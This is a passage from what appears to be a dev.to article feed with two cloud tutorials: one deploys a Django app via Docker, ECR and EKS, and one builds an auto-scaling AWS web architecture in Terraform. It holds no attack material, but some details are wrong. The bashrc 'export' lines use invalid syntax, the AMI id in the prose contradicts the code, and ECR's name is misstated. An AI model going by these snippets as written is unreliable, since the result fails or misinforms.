&lt;p&gt;This lists all the dependencies within the virtual environment. &lt;/p&gt;

&lt;p&gt;I then downloaded &lt;a href="https://docs.docker.com/get-docker/" rel="noopener noreferrer"&gt;Docker&lt;/a&gt; and created my docker file.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;touch Dockerfile
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Use the official Python image from the Docker Hub
FROM python:3.12-slim

# Set environment variables
ENV PYTHONUNBUFFERED=1

# Set the working directory
WORKDIR /app

# Copy the requirements file into the container
COPY requirements.txt /app/

# Install any needed packages specified in requirements.txt
RUN pip install --no-cache-dir -r requirements.txt

# Copy the current directory contents into the container at /app
COPY . /app/

# Expose port 8000
EXPOSE 8000

# Run the Django server
CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I run the command &lt;code&gt;docker build -t my-django-app .&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
which creates the Docker image shown on the desktop application.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuynqntx6w04fz8w4a6xc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuynqntx6w04fz8w4a6xc.png" alt="Image description" width="800" height="349"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Running &lt;code&gt;docker run -p 8000:8000 my-django-app&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
I can open the url path and see that my application is successfully running on Docker.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa9r1qaaiylj3xvuszdec.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa9r1qaaiylj3xvuszdec.png" alt="Image description" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, to deploy the application over Kubernetes, we can utilize Amazon ECR and EKS.&lt;/p&gt;

&lt;p&gt;Amazon Elastic Compute Registry will store the Docker container image. Amazon Elastic Kubernetes Service will deploy Kubernetes clusters and allows AWS to handle control plane operations.&lt;/p&gt;

&lt;p&gt;In my CLI, I run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws ecr get-login-password --region &amp;lt;my-region&amp;gt; | docker login --username AWS --password-stdin &amp;lt;my-account-id&amp;gt;.dkr.ecr.&amp;lt;my-region&amp;gt;.amazonaws.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;to authenticate Docker with my ECR registry.&lt;/p&gt;

&lt;p&gt;I run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker tag my-django-app:latest &amp;lt;my-account-id&amp;gt;.dkr.ecr.&amp;lt;my-region&amp;gt;.amazonaws.com/my-django-app:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;to tag the docker image.&lt;/p&gt;

&lt;p&gt;Finally, I push the image to ECR&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker push &amp;lt;your-account-id&amp;gt;.dkr.ecr.&amp;lt;your-region&amp;gt;.amazonaws.com/my-django-app:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  EKS
&lt;/h2&gt;

&lt;p&gt;Now, I navigate to Amazon EKS in the AWS console and create a cluster with the name "my-django-app". I kept default settings, but also created a security group with this permission&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3zwyznqsowo0hec45ce0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3zwyznqsowo0hec45ce0.png" alt="Image description" width="800" height="76"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This will allow the Kubernetes control plane access to AWS Resources.&lt;/p&gt;

&lt;p&gt;The clusters take awhile to create, but once that is finished, I connect to the EKS cluster with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws eks update-kubeconfig --region &amp;lt;my-region&amp;gt; --name &amp;lt;my-cluster-name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I created this yaml file in my project, which will set the configurations for my deployment&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-django-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: my-django-app
  template:
    metadata:
      labels:
        app: my-django-app
    spec:
      containers:
      - name: my-django-app
        image: &amp;lt;my-account-id&amp;gt;.dkr.ecr.&amp;lt;my-region&amp;gt;.amazonaws.com/my-django-app:latest
        ports:
        - containerPort: 8000
---
apiVersion: v1
kind: Service
metadata:
  name: my-django-app
spec:
  type: LoadBalancer
  selector:
    app: my-django-app
  ports:
  - protocol: TCP
    port: 80
    targetPort: 8000

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I then apply the deployment to the EKS cluster&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl apply -f deployment.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Check the pods are running&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get pods
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu7sv3uv5axbl6vhrh7p2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu7sv3uv5axbl6vhrh7p2.png" alt="Image description" width="800" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;My pods are not currently running as I need to configure a worker node group in the EKS console.&lt;/p&gt;

&lt;p&gt;I specified min=1, max=3, desired=2 using a t2.medium and a security group that allowed inbound SSH from my IP. &lt;/p&gt;

&lt;p&gt;I have to re-run the deployment and then run &lt;code&gt;kubectl get pods&lt;/code&gt; again.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F80kprscgzxyci11cnbto.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F80kprscgzxyci11cnbto.png" alt="Image description" width="800" height="258"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And verify the service's external IP&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get svc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I can now access my app through the IP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh5w8cbebric9ak550fxi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh5w8cbebric9ak550fxi.png" alt="Image description" width="800" height="299"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And here it is!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faxjstft2wha5qegr2bqa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faxjstft2wha5qegr2bqa.png" alt="Image description" width="800" height="251"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cleanup
&lt;/h2&gt;

&lt;p&gt;Delete the deployment&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl delete -f deployment.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and verify the deletion&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get pods
kubectl get svc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The EKS Cluster, the attached node group and ECR repository were deleted manually through the AWS console.&lt;/p&gt;

&lt;p&gt;Deploying a simple Django application using Docker and Kubernetes has been a practical and useful experience. This process, from building a Docker image to pushing it to Amazon ECR and deploying it on Amazon EKS, shows how these tools work together to manage application deployment.&lt;/p&gt;

&lt;p&gt;Starting from a local setup and moving to a cloud deployment gives you a clear understanding of current DevOps practices. Cleaning up the resources afterward ensures you avoid unnecessary costs and keeps your AWS environment tidy. This project not only enhances your understanding of Docker and Kubernetes but also prepares you for deploying more complex applications in the future.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Creating an Auto-Scaling Web Server Architecture</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Thu, 11 Jul 2024 19:56:19 +0000</pubDate>
      <link>https://dev.to/aktran321/creating-an-auto-scaling-web-server-architecture-1i3k</link>
      <guid>https://dev.to/aktran321/creating-an-auto-scaling-web-server-architecture-1i3k</guid>
      <description>&lt;p&gt;Since completing the AWS Cloud Resume Challenge, I've been more curious about Terraform. Today, I'll be using Terraform to create AWS architecture, containing Public Subnets, Private Subnets, Application Load Balancer (ALB), and Auto Scaling Group (ASG) for EC2 instances. The ASG scale instances up or down based on specific CPU usage thresholds.&lt;/p&gt;

&lt;p&gt;This type of process is crucial when trying to cut costs for a business. &lt;/p&gt;

&lt;p&gt;To start the project, I created another repository on Github and cloned it to my local computer. &lt;/p&gt;

&lt;p&gt;I created a main.tf file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~&amp;gt; 5.0"
    }
  }
}
provider "aws" {
  region     = "us-east-1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I made sure to define my environment variables in the .bashrc file. &lt;/p&gt;

&lt;p&gt;Run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;nano ~/.bashrc&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;and define your variables&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export AWS_ACCESS_KEY_ID = "&amp;lt;your aws user access key&amp;gt;"
export AWS_SECRET_ACCESS_KEY = "&amp;lt;your aws user secret key&amp;gt;"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After saving the file, the file needs to be reloaded for the variables to be accessible. &lt;/p&gt;

&lt;p&gt;To re-load run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;source ~/.bashrc&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The variables have to be defined whenever a new bash session is created.&lt;/p&gt;

&lt;p&gt;Defining the varuables in the bashrc script means we can remove these lines from our file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;access_key = "AWS_ACCESS_KEY_ID"
secret_key = "AWS_SECRET_ACCESS_KEY"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;because Terraform is able to pull your AWS credentials directly from the .bashrc script.&lt;/p&gt;

&lt;p&gt;To create a vpc, add this to main.tf:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Create a VPC
resource "aws_vpc" "example" {
  cidr_block = "10.0.0.0/16"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After running commands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;terraform init&lt;/li&gt;
&lt;li&gt;terraform apply&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I see that Terraform as completed creating my VPC.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fav1nc4kjn6fymjg3ljvi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fav1nc4kjn6fymjg3ljvi.png" alt="Image description" width="800" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I check my console to make sure it was created.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0967w3pun2ywrr4spgq2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0967w3pun2ywrr4spgq2.png" alt="Image description" width="800" height="88"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The ID's match up so Terraform is configured correctly. One thing to note, the name "example" is just an identifier for the resource by Terraform. If we want to name the VPC we would have to include a tag for the resource.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_vpc" "example" {
  cidr_block = "10.0.0.0/16"

  tags = {
    Name = "example-vpc"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can see here, that we don't have any subnets. We want to make 3 public and 3 private subnets&lt;/p&gt;

&lt;p&gt;Here is how to implement them&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Subnets
resource "aws_subnet" "public_1" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.1.0/24"
  availability_zone = "us-east-1a"
  map_public_ip_on_launch = true
}

resource "aws_subnet" "public_2" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.2.0/24"
  availability_zone = "us-east-1b"
  map_public_ip_on_launch = true
}

resource "aws_subnet" "public_3" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.3.0/24"
  availability_zone = "us-east-1c"
  map_public_ip_on_launch = true
}

resource "aws_subnet" "private_1" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.4.0/24"
  availability_zone = "us-east-1a"
}

resource "aws_subnet" "private_2" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.5.0/24"
  availability_zone = "us-east-1b"
}

resource "aws_subnet" "private_3" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.6.0/24"
  availability_zone = "us-east-1c"
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Having multiple subnets in different availability zones provides high availability in case EC2 instances are shutdown for any reason. &lt;/p&gt;

&lt;p&gt;Note that this line that the subnets are created in the correct VPC with this line&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;vpc_id            = aws_vpc.example.id
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The "example" is just the variable name we provided for our VPC earlier. &lt;/p&gt;

&lt;p&gt;Next, I created an internet gateway&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Internet Gateway
resource "aws_internet_gateway" "main" {
  vpc_id = aws_vpc.example.id
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next I create a route table and configure outbound traffic to be directed to the internet gateway that was just created.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Route Table for Public Subnets
resource "aws_route_table" "public" {
  vpc_id = aws_vpc.example.id

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = aws_internet_gateway.main.id
  }
}

# Route Table Associations for Public Subnets
resource "aws_route_table_association" "public_1" {
  subnet_id      = aws_subnet.public_1.id
  route_table_id = aws_route_table.public.id
}

resource "aws_route_table_association" "public_2" {
  subnet_id      = aws_subnet.public_2.id
  route_table_id = aws_route_table.public.id
}

resource "aws_route_table_association" "public_3" {
  subnet_id      = aws_subnet.public_3.id
  route_table_id = aws_route_table.public.id
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Route Table Associations resources associates the route table with the 3 public subnets.&lt;/p&gt;

&lt;p&gt;So to summarize&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;An internet gateway was created to connext the VPC to the internet.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The route table was created make all outbound traffic direct towards the internet gateway.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The aws_route_table_association resources link the public subnets to the route table. This ensures that traffic from instances within the subnets is directed to the internet gateway.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, we have to create a security group&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Security Group
resource "aws_security_group" "web" {
  vpc_id = aws_vpc.example.id

  ingress {
    from_port   = 80
    to_port     = 80
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The security group is specified as "web", and configured to the "example" vpc.&lt;/p&gt;

&lt;p&gt;The ingress rules allows incoming traffic on port 80 and specifies the TCP protocol. The cidr is specified to "0.0.0.0/0" so it will allow incoming HTTP traffic from anywhere&lt;/p&gt;

&lt;p&gt;The egress rule allows all outbound traffic from the instances associated with this security group. This is a common default setting that permits instances to initiate connections to any destination.&lt;/p&gt;

&lt;p&gt;Next we specify a User Data script&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# EC2 User Data Script
data "template_file" "userdata" {
  template = &amp;lt;&amp;lt;-EOF
              #!/bin/bash
              yum update -y
              yum install -y httpd
              systemctl start httpd
              systemctl enable httpd
              echo "Hello World from $(hostname -f)" &amp;gt; /var/www/html/index.html
            EOF
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The user data script is used to bootstrap the EC2 instance with necessary configurations and software installations when it first starts. In this case, it installs and configures an Apache web server and sets up a simple "Hello World" web page.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Launch Configuration
resource "aws_launch_configuration" "web" {
  name          = "web-launch-configuration"
  image_id      = "ami-0b72821e2f351e396" # Amazon Linux 2 AMI
  instance_type = "t2.micro"
  security_groups = [aws_security_group.web.id]

  user_data = data.template_file.userdata.rendered

  lifecycle {
    create_before_destroy = true
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This Terraform configuration defines an AWS Launch Configuration named "web-launch-configuration" for creating EC2 instances with specific settings. It specifies the use of the Amazon Linux 2 AMI (identified by the image_id "ami-0c55b159cbfafe1f0") and sets the instance type to "t2.micro". The EC2 instances launched with this configuration will use the security group referenced by aws_security_group.web.id. Additionally, a user data script, defined in the template_file data source, will be executed upon instance launch to install and start a web server. The lifecycle block ensures that new instances are created before the old ones are destroyed during updates, minimizing downtime.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Auto Scaling Group
resource "aws_autoscaling_group" "web" {
  vpc_zone_identifier = [aws_subnet.private_1.id, aws_subnet.private_2.id, aws_subnet.private_3.id]
  launch_configuration = aws_launch_configuration.web.id
  min_size             = 1
  max_size             = 3
  desired_capacity     = 1

  tag {
    key                 = "Name"
    value               = "web"
    propagate_at_launch = true
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This Auto Scaling Group specifies that EC2 instances should be launched in the identified three private subnets. It maintains a minimum of 1 instance, scales up to a maximum of 3 instances based on scaling policies, and starts with a desired capacity of 1 instance. The instances are launched using the specified launch configuration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Application Load Balancer
resource "aws_lb" "web" {
  name               = "web-alb"
  internal           = false
  load_balancer_type = "application"
  security_groups    = [aws_security_group.web.id]
  subnets            = [aws_subnet.public_1.id, aws_subnet.public_2.id, aws_subnet.public_3.id]
}

resource "aws_lb_target_group" "web" {
  name        = "web-tg"
  port        = 80
  protocol    = "HTTP"
  vpc_id      = aws_vpc.example.id
  target_type = "instance"
}

resource "aws_lb_listener" "web" {
  load_balancer_arn = aws_lb.web.arn
  port              = "80"
  protocol          = "HTTP"

  default_action {
    type             = "forward"
    target_group_arn = aws_lb_target_group.web.arn
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This Terraform configuration sets up an Application Load Balancer (ALB) named "web-alb" that is publicly accessible (internal = false) and uses the specified security group and public subnets. It also creates a target group named "web-tg" to route HTTP traffic on port 80 to instances within the specified VPC, and an ALB listener that listens for HTTP traffic on port 80, forwarding it to the target group. This configuration ensures that incoming HTTP traffic is balanced across the EC2 instances registered in the target group.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_autoscaling_attachment" "asg_attachment" {
  autoscaling_group_name = aws_autoscaling_group.web.name
  lb_target_group_arn   = aws_lb_target_group.web.arn
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The above resource attaches the ASG to the ALB's target group. This makes sure that the instances managed by the ASG are automatically registered with the ALB.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Next are two CloudWatch Alarms. These alarms trigger if CPU usage is over 75% or below 20% for longer than 30 seconds.


# CloudWatch Alarms
resource "aws_cloudwatch_metric_alarm" "high_cpu" {
  alarm_name                = "high-cpu-utilization"
  comparison_operator       = "GreaterThanThreshold"
  evaluation_periods        = "2"
  metric_name               = "CPUUtilization"
  namespace                 = "AWS/EC2"
  period                    = "30"
  statistic                 = "Average"
  threshold                 = "75"
  alarm_actions             = [aws_autoscaling_policy.scale_out.arn]
  dimensions = {
    AutoScalingGroupName = aws_autoscaling_group.web.name
  }
}

resource "aws_cloudwatch_metric_alarm" "low_cpu" {
  alarm_name                = "low-cpu-utilization"
  comparison_operator       = "LessThanThreshold"
  evaluation_periods        = "2"
  metric_name               = "CPUUtilization"
  namespace                 = "AWS/EC2"
  period                    = "30"
  statistic                 = "Average"
  threshold                 = "20"
  alarm_actions             = [aws_autoscaling_policy.scale_in.arn]
  dimensions = {
    AutoScalingGroupName = aws_autoscaling_group.web.name
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this last line&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dimensions = {
    AutoScalingGroupName = aws_autoscaling_group.web.name
  }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We are basically telling the alarm to monitor the instances in this specific ASG. &lt;/p&gt;

&lt;p&gt;Notice that we specified alarm_actions here to specific Auto Scaling Policies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;alarm_actions             = [aws_autoscaling_policy.scale_in.arn]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and here&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;alarm_actions             = [aws_autoscaling_policy.scale_out.arn]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These policies will now be created below, and are triggered when their associated CloudWatch Alarm is triggered.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Auto Scaling Policies
resource "aws_autoscaling_policy" "scale_out" {
  name                   = "scale_out"
  scaling_adjustment     = 1
  adjustment_type        = "ChangeInCapacity"
  cooldown               = 30
  autoscaling_group_name = aws_autoscaling_group.web.name
}

resource "aws_autoscaling_policy" "scale_in" {
  name                   = "scale_in"
  scaling_adjustment     = -1
  adjustment_type        = "ChangeInCapacity"
  cooldown               = 30
  autoscaling_group_name = aws_autoscaling_group.web.name
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Launching
&lt;/h2&gt;

&lt;p&gt;To launch we perform:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;terraform init&lt;/li&gt;
&lt;li&gt;terraform plan&lt;/li&gt;
&lt;li&gt;terraform apply&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now checking the VPC, we see that it has the public and private subnets with the route tables.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23asolmg3qy8bysgduj6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23asolmg3qy8bysgduj6.png" alt="Image description" width="800" height="307"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Navigating to EC2, we see that the ASG is correctly configured&lt;/p&gt;

